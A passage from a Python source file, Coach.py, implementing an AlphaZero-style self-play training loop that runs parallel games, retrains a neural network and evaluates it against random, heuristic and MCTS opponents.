pool.close()\n pool.join()\n\n res2 = [r.get() for r in res]\n print(\"Parallel [{}]: {}/{} \".format(enemy, *np.sum(res2, axis=0)[:2].astype(int)))\n return np.sum(res2, axis=0)[:2].astype(int)\n def learn(self):\n \"\"\"\n Performs numIters iterations with numEps episodes of self-play in each\n iteration. After every iteration, it retrains neural network with\n examples in trainExamples (which has a maximium length of maxlenofQueue).\n It then pits the new neural network against the old one and accepts it\n only if it wins >= updateThreshold fraction of games.\n \"\"\"\n import time\n gamesNum = self.args.numSelfPlayProcess*self.args.numPerProcessSelfPlay\n MyLogger.info(\"============== New Run ==============\")\n MyLogger.info(\"sims: {} cpuct: {} gamesNum: {} coeff: {} evalDepth: {} alpha: {} eps: {}\".format(\n self.args.numMCTSSims, self.args.cpuct, gamesNum,\n self.args.coeff, self.args.evaluationDepth, self.args.alpha, self.args.epsilon))\n for i in range(1, self.args.numIters+1):\n start = time.time()\n print('------ITER ' + str(i) + '------')\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n temp = self.parallel_self_play()\n iterationTrainExamples += temp\n self.trainExamplesHistory.append(iterationTrainExamples)\n self.parallel_train_network(i)\n self.trainExamplesHistory.clear()\n self.parallel_self_test_play(i)\n if self.args.multiCPU:\n resultRand=self.parallel_check_against(i, \"rp\")\n resultHeur=self.parallel_check_against(i, \"heuristic\")\n resultMCTS=self.parallel_check_against(i, \"n1p\")\n\n MyLogger.info(\"Iter:{} Heuristic: {} Random: {} MCTS: {}\".\n format(i, resultHeur, resultRand, resultMCTS))\n else:\n logCurrentCapabilities(self.game, i, self.args)\n # Reduce influence of lambdaHeur\n #self.args.lambdaHeur*=0.95\n #self.args.cpuct*=0.95\n end = time.time()\n diff =(end - start)\n print(diff)\n","sub_path":"Coach.py","file_name":"Coach.py","file_ext":"py","file_size_in_byte":16075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}